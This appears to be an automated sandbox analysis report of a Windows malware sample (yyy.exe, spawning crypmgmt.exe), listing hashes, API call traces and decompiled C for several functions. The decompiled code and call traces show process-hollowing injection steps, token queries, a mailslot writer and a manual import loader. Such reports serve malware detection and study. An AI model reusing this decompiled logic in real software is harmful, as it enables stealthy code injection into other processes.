  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 67591

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:479B945127CC75C2A44ED1B13482FB07
Total matches:36
Initial Analysis Report:Open
Initial sample Analysis ID:67591
Initial sample SHA 256:CA5C9DCD28B358A05CF0F3CDA193EB48861E9B0A51E8656C23BE5CAEDF1D2012
Initial sample name:yyy.exe

Similar Executed Functions

Function 002E3122, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
  • Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
  • Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
  • Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
APIs
  • NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
  • NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
  • NtClose.NTDLL(00000000), ref: 002E31D4
  • NtClose.NTDLL(002E618C), ref: 002E31DD
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
